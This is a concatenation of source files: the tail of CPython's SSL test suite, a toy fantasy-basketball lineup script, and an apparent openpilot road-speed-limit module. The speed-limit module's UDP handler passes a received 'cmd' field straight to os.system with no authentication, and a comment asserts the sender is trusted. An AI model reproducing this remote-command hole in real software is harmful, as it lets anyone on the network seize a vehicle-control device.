self.assertEqual(catch.unraisable.exc_type, TypeError)
def test_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
expected_algs = [
"AES256", "AES-256",
# TLS 1.3 ciphers are always enabled
"TLS_CHACHA20", "TLS_AES",
]
stats = server_params_test(client_context, server_context,
sni_name=hostname)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not any(alg in name for alg in expected_algs):
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
s = client_context.wrap_socket(socket.socket(),
server_hostname=hostname)
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(os_helper.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with open(os_helper.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
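    # Session resumption: reconnecting with a saved session must be counted
    # as a hit in the server context's session_stats().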
def test_session(self):
client_context, server_context, hostname = testing_context()
# TODO: sessions aren't compatible with TLSv1.3 yet
client_context.options |= ssl.OP_NO_TLSv1_3
# first connection without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context,
sni_name=hostname)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context,
session=session, sni_name=hostname)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
client_context, server_context, hostname = testing_context()
client_context2, _, _ = testing_context()
# TODO: session reuse does not work with TLSv1.3
client_context.options |= ssl.OP_NO_TLSv1_3
client_context2.options |= ssl.OP_NO_TLSv1_3
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
                # the session can be set before the handshake, i.e. before
                # the connection is established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with client_context2.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
@unittest.skipUnless(has_tls_version('TLSv1_3'), "Test needs TLS 1.3")
class TestPostHandshakeAuth(unittest.TestCase):
def test_pha_setter(self):
protocols = [
ssl.PROTOCOL_TLS_SERVER, ssl.PROTOCOL_TLS_CLIENT
]
for protocol in protocols:
ctx = ssl.SSLContext(protocol)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.post_handshake_auth = True
self.assertEqual(ctx.post_handshake_auth, True)
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, True)
ctx.post_handshake_auth = False
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertEqual(ctx.post_handshake_auth, False)
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.post_handshake_auth = True
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
self.assertEqual(ctx.post_handshake_auth, True)
def test_pha_required(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA method just returns true when cert is already available
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'GETCERT')
cert_text = s.recv(4096).decode('us-ascii')
self.assertIn('Python Software Foundation CA', cert_text)
def test_pha_required_nocert(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
# Ignore expected SSLError in ConnectionHandler of ThreadedEchoServer
# (it is only raised sometimes on Windows)
with threading_helper.catch_threading_exception() as cm:
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'PHA')
# receive CertificateRequest
self.assertEqual(s.recv(1024), b'OK\n')
# send empty Certificate + Finish
s.write(b'HASCERT')
# receive alert
with self.assertRaisesRegex(
ssl.SSLError,
'tlsv13 alert certificate required'):
s.recv(1024)
def test_pha_optional(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# check CERT_OPTIONAL
server_context.verify_mode = ssl.CERT_OPTIONAL
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_optional_nocert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_OPTIONAL
client_context.post_handshake_auth = True
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
# optional doesn't fail when client does not have a cert
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
def test_pha_no_pha_client(self):
client_context, server_context, hostname = testing_context()
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with self.assertRaisesRegex(ssl.SSLError, 'not server'):
s.verify_client_post_handshake()
s.write(b'PHA')
self.assertIn(b'extension not received', s.recv(1024))
def test_pha_no_pha_server(self):
# server doesn't have PHA enabled, cert is requested in handshake
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# PHA doesn't fail if there is already a cert
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
def test_pha_not_tls13(self):
# TLS 1.2
client_context, server_context, hostname = testing_context()
server_context.verify_mode = ssl.CERT_REQUIRED
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# PHA fails for TLS != 1.3
s.write(b'PHA')
self.assertIn(b'WRONG_SSL_VERSION', s.recv(1024))
def test_bpo37428_pha_cert_none(self):
# verify that post_handshake_auth does not implicitly enable cert
# validation.
hostname = SIGNED_CERTFILE_HOSTNAME
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.post_handshake_auth = True
client_context.load_cert_chain(SIGNED_CERTFILE)
# no cert validation and CA on client side
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
server_context.load_verify_locations(SIGNING_CA)
server_context.post_handshake_auth = True
server_context.verify_mode = ssl.CERT_REQUIRED
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'FALSE\n')
s.write(b'PHA')
self.assertEqual(s.recv(1024), b'OK\n')
s.write(b'HASCERT')
self.assertEqual(s.recv(1024), b'TRUE\n')
# server cert has not been validated
self.assertEqual(s.getpeercert(), {})
HAS_KEYLOG = hasattr(ssl.SSLContext, 'keylog_filename')
requires_keylog = unittest.skipUnless(
HAS_KEYLOG, 'test requires OpenSSL 1.1.1 with keylog callback')
class TestSSLDebug(unittest.TestCase):
def keylog_lines(self, fname=os_helper.TESTFN):
with open(fname) as f:
return len(list(f))
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_defaults(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
self.assertFalse(os.path.isfile(os_helper.TESTFN))
ctx.keylog_filename = os_helper.TESTFN
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
self.assertTrue(os.path.isfile(os_helper.TESTFN))
self.assertEqual(self.keylog_lines(), 1)
ctx.keylog_filename = None
self.assertEqual(ctx.keylog_filename, None)
with self.assertRaises((IsADirectoryError, PermissionError)):
# Windows raises PermissionError
ctx.keylog_filename = os.path.dirname(
os.path.abspath(os_helper.TESTFN))
with self.assertRaises(TypeError):
ctx.keylog_filename = 1
@requires_keylog
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_filename(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
client_context, server_context, hostname = testing_context()
client_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# header, 5 lines for TLS 1.3
self.assertEqual(self.keylog_lines(), 6)
client_context.keylog_filename = None
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 11)
client_context.keylog_filename = os_helper.TESTFN
server_context.keylog_filename = os_helper.TESTFN
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertGreaterEqual(self.keylog_lines(), 21)
client_context.keylog_filename = None
server_context.keylog_filename = None
@requires_keylog
@unittest.skipIf(sys.flags.ignore_environment,
"test is not compatible with ignore_environment")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_keylog_env(self):
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with unittest.mock.patch.dict(os.environ):
os.environ['SSLKEYLOGFILE'] = os_helper.TESTFN
self.assertEqual(os.environ['SSLKEYLOGFILE'], os_helper.TESTFN)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.keylog_filename, None)
ctx = ssl.create_default_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.keylog_filename, os_helper.TESTFN)
def test_msg_callback(self):
client_context, server_context, hostname = testing_context()
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
self.assertIs(client_context._msg_callback, None)
client_context._msg_callback = msg_cb
self.assertIs(client_context._msg_callback, msg_cb)
with self.assertRaises(TypeError):
client_context._msg_callback = object()
def test_msg_callback_tls12(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_TLSv1_3
msg = []
def msg_cb(conn, direction, version, content_type, msg_type, data):
self.assertIsInstance(conn, ssl.SSLSocket)
self.assertIsInstance(data, bytes)
self.assertIn(direction, {'read', 'write'})
msg.append((direction, version, content_type, msg_type))
client_context._msg_callback = msg_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertIn(
("read", TLSVersion.TLSv1_2, _TLSContentType.HANDSHAKE,
_TLSMessageType.SERVER_KEY_EXCHANGE),
msg
)
self.assertIn(
("write", TLSVersion.TLSv1_2, _TLSContentType.CHANGE_CIPHER_SPEC,
_TLSMessageType.CHANGE_CIPHER_SPEC),
msg
)
def test_msg_callback_deadlock_bpo43577(self):
client_context, server_context, hostname = testing_context()
server_context2 = testing_context()[1]
def msg_cb(conn, direction, version, content_type, msg_type, data):
pass
def sni_cb(sock, servername, ctx):
sock.context = server_context2
server_context._msg_callback = msg_cb
server_context.sni_callback = sni_cb
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
class TestEnumerations(unittest.TestCase):
def test_tlsversion(self):
class CheckedTLSVersion(enum.IntEnum):
MINIMUM_SUPPORTED = _ssl.PROTO_MINIMUM_SUPPORTED
SSLv3 = _ssl.PROTO_SSLv3
TLSv1 = _ssl.PROTO_TLSv1
TLSv1_1 = _ssl.PROTO_TLSv1_1
TLSv1_2 = _ssl.PROTO_TLSv1_2
TLSv1_3 = _ssl.PROTO_TLSv1_3
MAXIMUM_SUPPORTED = _ssl.PROTO_MAXIMUM_SUPPORTED
enum._test_simple_enum(CheckedTLSVersion, TLSVersion)
def test_tlscontenttype(self):
class Checked_TLSContentType(enum.IntEnum):
"""Content types (record layer)
See RFC 8446, section B.1
"""
CHANGE_CIPHER_SPEC = 20
ALERT = 21
HANDSHAKE = 22
APPLICATION_DATA = 23
# pseudo content types
HEADER = 0x100
INNER_CONTENT_TYPE = 0x101
enum._test_simple_enum(Checked_TLSContentType, _TLSContentType)
def test_tlsalerttype(self):
class Checked_TLSAlertType(enum.IntEnum):
"""Alert types for TLSContentType.ALERT messages
See RFC 8446, section B.2
"""
CLOSE_NOTIFY = 0
UNEXPECTED_MESSAGE = 10
BAD_RECORD_MAC = 20
DECRYPTION_FAILED = 21
RECORD_OVERFLOW = 22
DECOMPRESSION_FAILURE = 30
HANDSHAKE_FAILURE = 40
NO_CERTIFICATE = 41
BAD_CERTIFICATE = 42
UNSUPPORTED_CERTIFICATE = 43
CERTIFICATE_REVOKED = 44
CERTIFICATE_EXPIRED = 45
CERTIFICATE_UNKNOWN = 46
ILLEGAL_PARAMETER = 47
UNKNOWN_CA = 48
ACCESS_DENIED = 49
DECODE_ERROR = 50
DECRYPT_ERROR = 51
EXPORT_RESTRICTION = 60
PROTOCOL_VERSION = 70
INSUFFICIENT_SECURITY = 71
INTERNAL_ERROR = 80
INAPPROPRIATE_FALLBACK = 86
USER_CANCELED = 90
NO_RENEGOTIATION = 100
MISSING_EXTENSION = 109
UNSUPPORTED_EXTENSION = 110
CERTIFICATE_UNOBTAINABLE = 111
UNRECOGNIZED_NAME = 112
BAD_CERTIFICATE_STATUS_RESPONSE = 113
BAD_CERTIFICATE_HASH_VALUE = 114
UNKNOWN_PSK_IDENTITY = 115
CERTIFICATE_REQUIRED = 116
NO_APPLICATION_PROTOCOL = 120
enum._test_simple_enum(Checked_TLSAlertType, _TLSAlertType)
def test_tlsmessagetype(self):
class Checked_TLSMessageType(enum.IntEnum):
"""Message types (handshake protocol)
See RFC 8446, section B.3
"""
HELLO_REQUEST = 0
CLIENT_HELLO = 1
SERVER_HELLO = 2
HELLO_VERIFY_REQUEST = 3
NEWSESSION_TICKET = 4
END_OF_EARLY_DATA = 5
HELLO_RETRY_REQUEST = 6
ENCRYPTED_EXTENSIONS = 8
CERTIFICATE = 11
SERVER_KEY_EXCHANGE = 12
CERTIFICATE_REQUEST = 13
SERVER_DONE = 14
CERTIFICATE_VERIFY = 15
CLIENT_KEY_EXCHANGE = 16
FINISHED = 20
CERTIFICATE_URL = 21
CERTIFICATE_STATUS = 22
SUPPLEMENTAL_DATA = 23
KEY_UPDATE = 24
NEXT_PROTO = 67
MESSAGE_HASH = 254
CHANGE_CIPHER_SPEC = 0x0101
enum._test_simple_enum(Checked_TLSMessageType, _TLSMessageType)
def test_sslmethod(self):
Checked_SSLMethod = enum._old_convert_(
enum.IntEnum, '_SSLMethod', 'ssl',
lambda name: name.startswith('PROTOCOL_') and name != 'PROTOCOL_SSLv23',
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLMethod, ssl._SSLMethod)
def test_options(self):
CheckedOptions = enum._old_convert_(
enum.IntFlag, 'Options', 'ssl',
lambda name: name.startswith('OP_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedOptions, ssl.Options)
def test_alertdescription(self):
CheckedAlertDescription = enum._old_convert_(
enum.IntEnum, 'AlertDescription', 'ssl',
lambda name: name.startswith('ALERT_DESCRIPTION_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedAlertDescription, ssl.AlertDescription)
def test_sslerrornumber(self):
Checked_SSLErrorNumber = enum._old_convert_(
enum.IntEnum, 'SSLErrorNumber', 'ssl',
lambda name: name.startswith('SSL_ERROR_'),
source=ssl._ssl,
)
enum._test_simple_enum(Checked_SSLErrorNumber, ssl.SSLErrorNumber)
def test_verifyflags(self):
CheckedVerifyFlags = enum._old_convert_(
enum.IntFlag, 'VerifyFlags', 'ssl',
lambda name: name.startswith('VERIFY_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyFlags, ssl.VerifyFlags)
def test_verifymode(self):
CheckedVerifyMode = enum._old_convert_(
enum.IntEnum, 'VerifyMode', 'ssl',
lambda name: name.startswith('CERT_'),
source=ssl._ssl,
)
enum._test_simple_enum(CheckedVerifyMode, ssl.VerifyMode)
def test_main(verbose=False):
if support.verbose:
plats = {
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SSLObjectTests, SimpleBackgroundTests, ThreadedTests,
TestPostHandshakeAuth, TestSSLDebug
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
thread_info = threading_helper.threading_setup()
try:
support.run_unittest(*tests)
finally:
threading_helper.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
lineups.py
|
#!./../../tools/python/bin/python
import os
import sys
from datetime import datetime
import queue
import threading
import time
def processLineups():
while 1:
time.sleep(2)
print('hi'+str(a))
def __init__(self):
pass
def conditions():
return True
if __name__ == '__main__':
a = 67895
w = threading.Thread(name='processLineups', target=processLineups)
w.start()
dt = datetime.now()
dt = '_'.join([str(dt.hour), str(dt.minute), str(dt.second), str(dt.microsecond)[0:2]])
with open('/media/vishnu/Elements/CodingEnv/data/nba/20170930/FanDuel-NBA-21220-211645586_out.csv', 'r') as file:
data = file.read().split('\n')
data = [[y.replace('"', '') for y in x.split(',')] for x in data if x != '']
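# build a column-name -> index map from the CSV header row, then drop the header row itself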
header = {k: v for v, k in enumerate(data[0])}
del data[0]
data = [[x[header['Id']], x[header['Position']], x[header['Name']], int(x[header['Salary']]),
float(x[header['Points']]), x[header['Team']], x[header['Include']]] for x in data]
header = {'Id':0, 'Position':1, 'Name':2, 'Salary':3, 'Points':4, 'Team':5, 'Include':6 }
#limit = 150
params = {'lineupsLimit': 150, 'maxMatchingPlayers':7, 'site': 'FD'}
posSelect = {'PF':[], 'SF':[], 'PG':[], 'SG':[], 'C':[], 'G':[], 'F':[], 'UTIL':[]}
positions = {}
salary = {}
points = {}
name = {}
team = {}
lineup = set()
lineups = []
#sorting the players based on points
data = sorted(data, key=lambda x: x[header['Points']], reverse=True)
for i in range(0, len(data)):
if data[i][header['Include']] == 'y':
#appending positions
pos = data[i][header['Position']].split('/')
for val in pos:
if val in posSelect.keys():
posSelect[val].append(data[i][header['Id']])
if val in ['SF', 'PF']:
posSelect['F'].append(data[i][header['Id']])
if val in ['PG', 'SG']:
posSelect['G'].append(data[i][header['Id']])
posSelect['UTIL'].append(data[i][header['Id']])
#getting player position
positions[data[i][header['Id']]] = pos
#getting salary
salary[data[i][header['Id']]] = data[i][header['Salary']]
#getting points
points[data[i][header['Id']]] = data[i][header['Points']]
# getting name
name[data[i][header['Id']]] = data[i][header['Name']]
# getting team
team[data[i][header['Id']]] = data[i][header['Team']]
if params["site"] == "FD":
pass
while 1:
time.sleep(2)
print('yo'+str(a))
|
road_speed_limiter.py
|
import json
import os
import select
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.params import Params
from common.numpy_fast import interp, clip
from common.realtime import sec_since_boot
from selfdrive.config import Conversions as CV
CAMERA_SPEED_FACTOR = 1.05
class Port:
BROADCAST_PORT = 2899
RECEIVE_PORT = 2843
LOCATION_PORT = 2911
class RoadLimitSpeedServer:
def __init__(self):
self.json_road_limit = None
self.active = 0
self.last_updated = 0
self.last_updated_active = 0
self.last_exception = None
self.lock = threading.Lock()
self.remote_addr = None
broadcast = Thread(target=self.broadcast_thread, args=[])
broadcast.daemon = True
broadcast.start()
# gps = Thread(target=self.gps_thread, args=[])
# gps.setDaemon(True)
# gps.start()
def gps_thread(self):
sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
while True:
try:
sm.update()
if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
location = sm['gpsLocationExternal']
json_location = json.dumps([
location.latitude,
location.longitude,
location.altitude,
location.speed,
location.bearingDeg,
location.accuracy,
location.timestamp,
location.source,
location.vNED,
location.verticalAccuracy,
location.bearingAccuracyDeg,
location.speedAccuracy,
])
address = (self.remote_addr[0], Port.LOCATION_PORT)
sock.sendto(json_location.encode(), address)
else:
time.sleep(1.)
except Exception as e:
print("exception", e)
time.sleep(1.)
def get_broadcast_address(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
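# 0x8919 is the SIOCGIFBRDADDR ioctl: query the broadcast address of the wlan0 interface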
ip = fcntl.ioctl(
s.fileno(),
0x8919,
struct.pack('256s', 'wlan0'.encode('utf-8'))
)[20:24]
return socket.inet_ntoa(ip)
except:
return None
def broadcast_thread(self):
broadcast_address = None
frame = 0
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
while True:
try:
if broadcast_address is None or frame % 10 == 0:
broadcast_address = self.get_broadcast_address()
print('broadcast_address', broadcast_address)
if broadcast_address is not None:
address = (broadcast_address, Port.BROADCAST_PORT)
sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
except:
pass
time.sleep(5.)
frame += 1
except:
pass
def udp_recv(self, sock):
ret = False
try:
ready = select.select([sock], [], [], 1.)
ret = bool(ready[0])
if ret:
data, self.remote_addr = sock.recvfrom(2048)
json_obj = json.loads(data.decode())
if 'cmd' in json_obj:
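# executes a shell command received over UDP (the sender is assumed to be a trusted controller on the local network)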
try:
os.system(json_obj['cmd'])
except:
pass
if 'echo' in json_obj:
try:
echo = json.dumps(json_obj["echo"])
sock.sendto(echo.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
except:
pass
try:
self.lock.acquire()
try:
if 'active' in json_obj:
self.active = json_obj['active']
self.last_updated_active = sec_since_boot()
except:
pass
if 'road_limit' in json_obj:
self.json_road_limit = json_obj['road_limit']
self.last_updated = sec_since_boot()
finally:
self.lock.release()
except:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
return ret
def check(self):
now = sec_since_boot()
if now - self.last_updated > 20.:
try:
self.lock.acquire()
self.json_road_limit = None
finally:
self.lock.release()
if now - self.last_updated_active > 10.:
self.active = 0
def get_limit_val(self, key, default=None):
try:
if self.json_road_limit is None:
return default
if key in self.json_road_limit:
return self.json_road_limit[key]
except:
pass
return default
def main():
server = RoadLimitSpeedServer()
roadLimitSpeed = messaging.pub_sock('roadLimitSpeed')
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
try:
try:
sock.bind(('0.0.0.0', 843))
except:
sock.bind(('0.0.0.0', Port.RECEIVE_PORT))
sock.setblocking(False)
while True:
if server.udp_recv(sock):
dat = messaging.new_message()
dat.init('roadLimitSpeed')
dat.roadLimitSpeed.active = server.active
dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False)
dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0)
dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
dat.roadLimitSpeed.camSpeedFactor = server.get_limit_val("cam_speed_factor", CAMERA_SPEED_FACTOR)
roadLimitSpeed.send(dat.to_bytes())
server.check()
except Exception as e:
server.last_exception = e
class RoadSpeedLimiter:
def __init__(self):
self.slowing_down = False
self.start_dist = 0
self.longcontrol = Params().get_bool('LongControlEnabled')
self.sock = messaging.sub_sock("roadLimitSpeed")
self.roadLimitSpeed = None
def recv(self):
try:
dat = messaging.recv_sock(self.sock, wait=False)
if dat is not None:
self.roadLimitSpeed = dat.roadLimitSpeed
except:
pass
def get_active(self):
self.recv()
if self.roadLimitSpeed is not None:
return self.roadLimitSpeed.active
return 0
def get_max_speed(self, cluster_speed, is_metric):
log = ""
self.recv()
if self.roadLimitSpeed is None:
return 0, 0, 0, False, ""
try:
road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
is_highway = self.roadLimitSpeed.isHighway
cam_type = int(self.roadLimitSpeed.camType)
cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
cam_limit_speed = self.roadLimitSpeed.camLimitSpeed
section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
